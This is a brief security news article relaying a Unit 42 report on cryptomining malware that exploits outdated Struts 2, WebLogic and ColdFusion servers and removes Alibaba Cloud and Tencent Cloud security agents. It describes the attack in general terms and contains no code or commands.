Malware targets Alibaba Cloud and Tencent Cloud Server to mine cryptocurrency

The latest report released by security company Palo Alto Networks Unit 42 shows that there are currently hacker groups developing malware specifically for infiltrating Linux servers to mine Monero cryptocurrency.

The hacker team mainly launched attacks on cloud servers by exploiting vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. It is well known that the old versions of the above-mentioned well-known software have been found to have serious security vulnerabilities. Of course, the vulnerabilities are long ago and the new version has long been fixed. But there is no doubt that many companies still do not upgrade the software and still use the old version, hackers hope to infect the server through these vulnerabilities.

Image: paloaltonetworks

Automated scripts were written by the hacker team use crawlers to scan individual websites and servers, and use vulnerabilities to infiltrate if a vulnerability is detected. After successful penetration, the malicious script is downloaded and written to boot from the boot to maintain persistence, and then the script is executed to exploit the processor power to mine the Monero cryptocurrency.

In addition, the malicious script automatically configures iptables rules to block other malware, hide its own processes, and uninstall other cloud security products.

The researchers found that the malware aimed at users in China, as it will unload Ali cloud security monitoring component and Tencent cloud. Alibaba Cloud and Tencent Cloud are cloud service providers with high domestic market share, so the hacker team also specially handles the servers of the above brands.

Of course, this malware does not only attack Alibaba Cloud and Tencent Cloud products but at least it can be said that the virus writer is a high probability of being a China hacker team.